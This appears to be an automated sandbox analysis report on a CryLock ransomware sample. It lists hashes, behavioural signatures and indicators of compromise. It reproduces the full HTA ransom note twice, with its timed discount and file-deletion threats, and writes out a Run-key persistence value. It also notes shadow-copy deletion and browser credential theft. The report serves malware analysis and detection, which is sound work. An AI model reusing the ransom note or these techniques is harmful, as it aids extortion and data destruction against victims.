crylock | 4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba

General

Target

2f2d4eb24662c916f822f9c3fd55c9b2.exe
Size

206KB
MD5

2f2d4eb24662c916f822f9c3fd55c9b2
SHA1

9d5bda347f70b8f928803a28782a1018d9f2d0e0
SHA256

4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba
SHA512

1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5
SSDEEP

3072:0bOTRwYckApvw14pcODvX/kyeAYcWNzs2C3Zm4YSYoj1ZYJJCpdXfabI8AKgcJuU:wOsZiKRJWWY1dJJQdHrYuFC

Score

10^/10

crylock discovery persistence ransomware spyware stealer

Malware Config

Extracted

Family

crylock

Attributes

emails
[email protected]

[email protected]
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+'     '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

rsa_pubkey.plain

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-3627615824-4061627003-3019543961-1000\how_to_decrypt.hta

Ransom Note

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('January 3 2024 21:52:49'); var discount_date = new Date('January 5 2024 21:52:49'); var end_date = new Date('January 6 2024 21:52:49'); var main_contact = '[email protected]'; var hid = '[8D4A7D42-0DE8844C]'; var second_contact = '[email protected]'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+'     '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

Emails

[email protected]

Signatures

Crylock
Ransomware family, which is a new variant of Cryakl ransomware.
ransomware crylock
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\8D4A7D42-0DE8844C = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2f2d4eb24662c916f822f9c3fd55c9b2.exe\" -id \"8D4A7D42-0DE8844C\" -wid \"vis\""	2f2d4eb24662c916f822f9c3fd55c9b2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\398670 = "398670"	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops desktop.ini file(s) 37 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\appdata\local\microsoft\windows mail\stationery\Desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\recorded tv\sample media\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\local\microsoft\feeds cache\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\documents\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\favorites\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\documents\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\videos\sample videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\local\microsoft\feeds cache\0u93yk0n\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\local\microsoft\feeds cache\27pkr52p\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\desktop\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\downloads\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\links\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\favorites\links for united states\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\pictures\sample pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\recorded tv\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\f:\$recycle.bin\s-1-5-21-3627615824-4061627003-3019543961-1000\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\local\microsoft\feeds cache\bp3uabcb\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\local\microsoft\feeds cache\fw0p2mzh\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\contacts\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\searches\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\music\sample music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\$recycle.bin\s-1-5-21-3627615824-4061627003-3019543961-1000\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\favorites\links\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\saved games\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\downloads\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\libraries\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description ioc process

File opened (read-only) \??\F: 2f2d4eb24662c916f822f9c3fd55c9b2.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2552 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

pid process

2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe
2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe

description	ioc	process
File opened (read-only)	\??\F:	2f2d4eb24662c916f822f9c3fd55c9b2.exe

pid	process
2552	vssadmin.exe

pid	process
2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe
2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

WMIC.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2692	WMIC.exe
Token: SeSecurityPrivilege	2692	WMIC.exe
Token: SeTakeOwnershipPrivilege	2692	WMIC.exe
Token: SeLoadDriverPrivilege	2692	WMIC.exe
Token: SeSystemProfilePrivilege	2692	WMIC.exe
Token: SeSystemtimePrivilege	2692	WMIC.exe
Token: SeProfSingleProcessPrivilege	2692	WMIC.exe
Token: SeIncBasePriorityPrivilege	2692	WMIC.exe
Token: SeCreatePagefilePrivilege	2692	WMIC.exe
Token: SeBackupPrivilege	2692	WMIC.exe
Token: SeRestorePrivilege	2692	WMIC.exe
Token: SeShutdownPrivilege	2692	WMIC.exe
Token: SeDebugPrivilege	2692	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2692	WMIC.exe
Token: SeRemoteShutdownPrivilege	2692	WMIC.exe
Token: SeUndockPrivilege	2692	WMIC.exe
Token: SeManageVolumePrivilege	2692	WMIC.exe
Token: 33	2692	WMIC.exe
Token: 34	2692	WMIC.exe
Token: 35	2692	WMIC.exe
Token: SeBackupPrivilege	2304	vssvc.exe
Token: SeRestorePrivilege	2304	vssvc.exe
Token: SeAuditPrivilege	2304	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2692	WMIC.exe
Token: SeSecurityPrivilege	2692	WMIC.exe
Token: SeTakeOwnershipPrivilege	2692	WMIC.exe
Token: SeLoadDriverPrivilege	2692	WMIC.exe
Token: SeSystemProfilePrivilege	2692	WMIC.exe
Token: SeSystemtimePrivilege	2692	WMIC.exe
Token: SeProfSingleProcessPrivilege	2692	WMIC.exe
Token: SeIncBasePriorityPrivilege	2692	WMIC.exe
Token: SeCreatePagefilePrivilege	2692	WMIC.exe
Token: SeBackupPrivilege	2692	WMIC.exe
Token: SeRestorePrivilege	2692	WMIC.exe
Token: SeShutdownPrivilege	2692	WMIC.exe
Token: SeDebugPrivilege	2692	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2692	WMIC.exe
Token: SeRemoteShutdownPrivilege	2692	WMIC.exe
Token: SeUndockPrivilege	2692	WMIC.exe
Token: SeManageVolumePrivilege	2692	WMIC.exe
Token: 33	2692	WMIC.exe
Token: 34	2692	WMIC.exe
Token: 35	2692	WMIC.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.execmd.execmd.exe

description	pid	process	target process
PID 2364 wrote to memory of 2808	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2808	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2808	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
